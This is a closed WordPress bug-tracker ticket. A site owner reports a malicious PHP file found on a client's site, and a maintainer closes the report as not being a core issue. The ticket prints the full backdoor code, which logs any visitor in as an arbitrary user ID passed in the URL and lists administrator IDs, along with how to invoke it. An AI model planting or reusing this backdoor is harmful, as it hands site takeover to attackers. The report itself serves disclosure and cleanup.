WordPress.org

Make WordPress Core

Opened 6 months ago

Closed 6 months ago

Last modified 6 months ago

#50007 closed defect (bug) (invalid)

Using this code find in my client site and using this code any one can login without ID password

Reported by: piyushmca Owned by:
Milestone: Priority: normal
Severity: normal Version: 5.4
Component: General Keywords:
Focuses: Cc:

Description

<?php
$path = $_SERVER['DOCUMENT_ROOT'];

include_once $path . '/wp-config.php';
include_once $path . '/wp-load.php';
include_once $path . '/wp-includes/wp-db.php';
include_once $path . '/wp-includes/pluggable.php';
ob_start();

$id = $_GET['id'];

        if(!is_user_logged_in()){
     wp_set_current_user($id);
        wp_set_auth_cookie($id);
       
        }
  function admin_user_ids(){
    //Grab wp DB
    global $wpdb;
    //Get all users in the DB
    $wp_user_search = $wpdb->get_results("SELECT ID, display_name FROM $wpdb->users ORDER BY ID");

    //Blank array
    $adminArray = array();
    //Loop through all users
    foreach ( $wp_user_search as $userid ) {
        //Current user ID we are looping through
        $curID = $userid->ID;
        //Grab the user info of current ID
        $curuser = get_userdata($curID);
        //Current user level
        $user_level = $curuser->user_level;
        //Only look for admins
        if($user_level >= 8){//levels 8, 9 and 10 are admin
            //Push user ID into array
            $adminArray[] = $curID;
        }
    }
    return $adminArray;
}

 $adminIdArray = admin_user_ids();
   
   print_r($adminIdArray); 

Above code find in my client site and using this code any one can login without ID password
just create this file and get admin id and They pass id in url like www.any site.com/hackfile.php?id=1

Also this file is not scan any security plugin

Change History (2)

#1 @Otto42
6 months ago

  • Milestone Awaiting Review deleted
  • Resolution set to invalid
  • Status changed from assigned to closed

Yes, that is malicious code, but it is not part of the WordPress system.

You should investigate how this code got onto your site in the first place, and address that security issue.

In the meantime, this is not the correct place to discuss this issue, as this is the bugtracker for the core software, which this is not part of.

You can talk about it in the Support Forums, and you should read the help article available there:

https://wordpress.org/support/article/faq-my-site-was-hacked/

#2 @Otto42
6 months ago

  • Keywords Login security login-without-ID-password removed
Note: See TracTickets for help on using tickets.